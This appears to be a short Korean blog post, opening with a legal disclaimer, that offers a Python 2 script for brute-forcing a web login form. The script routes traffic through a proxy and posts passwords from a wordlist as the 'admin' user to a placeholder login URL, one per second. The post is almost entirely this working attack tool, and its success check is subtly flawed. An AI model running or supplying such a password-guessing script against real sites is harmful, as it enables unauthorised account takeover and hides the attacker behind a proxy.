Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.

python brute force http, https with proxy

# -*- coding: utf-8 -*-
import urllib, urllib2, optparse, time

opener = urllib2.build_opener(
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.ProxyHandler({'http': 'http://proxy_url:port', 'https': 'http://proxy_url:port'}))
urllib2.install_opener(opener)


def post_request(url, params) :
	param = urllib.urlencode(params)
	request = urllib2.Request(url, param)
	
	response = urllib2.urlopen(request)
	response_info = response.info()
	response_html = response.read()
	response.close()

	if response_html.find('用'.decode('gb2312').encode('utf-8'), 0, 100) :
		print(" .")
	else : 
		print("found password!!")

def get_request(url) :
	response = urllib2.urlopen(url)
	response_info = response.info()
	response_html = response.read()
	response.close()

def main():
	parser = optparse.OptionParser('usage bf.py -f passwordfile')
	parser.add_option('-f', dest='filename', type='string', help='input file')

	(options, args) = parser.parse_args()

	filename = options.filename

	if filename == None :
		print parser.usage
		exit(0)

	f = file(filename, 'r')

	while True:
		line = f.readline()

		if not line  :
			# file end
			break
		else :
			print ("passwd : " + line.rstrip('\n'))
			post_url = "https://target.domain/path/login.action"
			post_params = { 
			'paraam1':'test',
			'UserId':'admin',
			'UserPass':line.rstrip('\n')
			}
			post_request(post_url, post_params)

			time.sleep(1)

if __name__ == '__main__':
    main()